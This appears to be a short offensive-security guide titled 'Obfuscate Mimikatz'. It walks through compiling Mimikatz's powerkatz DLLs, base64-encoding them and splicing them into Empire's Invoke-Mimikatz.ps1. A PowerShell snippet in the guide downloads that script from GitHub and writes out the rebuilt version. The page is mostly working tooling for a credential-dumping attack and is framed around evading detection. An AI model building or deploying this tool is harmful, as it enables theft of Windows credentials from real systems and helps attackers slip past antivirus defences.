Obfuscate Mimikatz


Update .ps1

Update the Invoke-Mimikatz.ps1 PowerShell script:

  1. Grab source code zip from the latest (or any one you want) release of Mimikatz.

  2. Open the solution in Visual Studio.

  3. Select the Second_Release_PowerShell target option and compile for Win32.

  4. Right-click on mimikatz solution > Properties > C/C++ > Set Treat warnings as errors to No (/WX-) > OK.

  5. Compile for x64.

  6. Transform the resulting powerkatz DLLs to base64 and replace the $PEBytes32 and $PEBytes64 vars at the bottom of Invoke-Mimikatz.ps1 with a PowerShell script below.

$powerkatz32 = [System.IO.File]::ReadAllBytes("Win32\powerkatz.dll")
$powerkatz64 = [System.IO.File]::ReadAllBytes("x64\powerkatz.dll")
$encPowerkatz32 = [System.Convert]::ToBase64String($powerkatz32)
$encPowerkatz64 = [System.Convert]::ToBase64String($powerkatz64)
$invokeMimikatz = (New-Object Net.WebClient).DownloadString("https://github.com/BC-SECURITY/Empire/raw/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1") -replace '\$PEBytes32 = .*$', ('$PEBytes32 = ' + "'$encPowerkatz32'")
$invokeMimikatz -replace '\$PEBytes64 = .*$', ('$PEBytes64 = ' + "'$encPowerkatz64'") > Invoke-Mimikatz.ps1

Last updated